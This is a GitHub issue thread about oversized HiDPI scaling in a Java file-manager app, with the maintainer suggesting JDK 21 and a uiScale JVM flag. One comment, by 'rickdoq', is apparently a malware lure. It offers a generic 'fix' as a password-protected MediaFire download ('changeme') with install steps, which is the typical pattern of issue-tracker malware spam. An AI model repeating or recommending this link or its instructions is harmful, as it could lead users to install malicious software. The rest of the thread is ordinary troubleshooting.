### ISSUE TITLE
Bug: Everything was too magnified.

### ISSUE THREAD

**Issue by rwperrott** [stant/jfileprocessorRest#2]
- The initial dialogs, for missing files, were far too large.
- The app. window was too wide.
- All of the text and controls on the app. window were far too large.

I couldn't find any settings to fix this, over 200% scaled-up, behaviour.

System: Linux Mint 22 Xfce 64-bit, with three 1080 HD screens

I was hoping that this could support 2 pane mode, with copy and move buttons, because I selectively copy between two set of directories a lot; from my brief look, I couldn't find that. See GPSoft Directory Opus to see this done well; I have a copy running via Wine, but it's not a great experience.  Note: cut and paste, or drag and drop, between pans or tabs,m like for Thunar, soon becomes tiresome and even error prone; dedicated copy and move buttons are far easier and more reliable.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by stant** [comment]
Hi. Thanks for your comment, but without a picture, I don't know if you are seeing a problem, or just making suggestions :-) You can resize your window and a few panes inside. Here is my desktop. It works ok for me. I open 2 more windows to copy between them. I have more ideas, but not for a 2nd pane and not tabs for now. I generally use a 2nd 1080 screen and things seem fine. include a picture if you want and point out your problems. I have seen a general scaling issue in the past. Are you using a new enough version of Java, like 17?

![jfp-screenshot](https://github.com/user-attachments/assets/46bf7845-7b58-4715-b8b6-d608e841f2af)

**Comment by stant** [comment]
maybe this is your problem?
Use temurin jdk 21 or Jetbrain JDK 21 and luanch netbeans 23. The netbeans UI on HiDPI screen with 2x scale looks like 4x scaled.

might have to set -Dsun.java2d.uiScale.enabled=false too whenever GDK_SCALE is set to prevent double scaling issues.

see: https://github.com/apache/netbeans/issues/7780

I don't know why but I did not seem to get an email when you opened this issue.
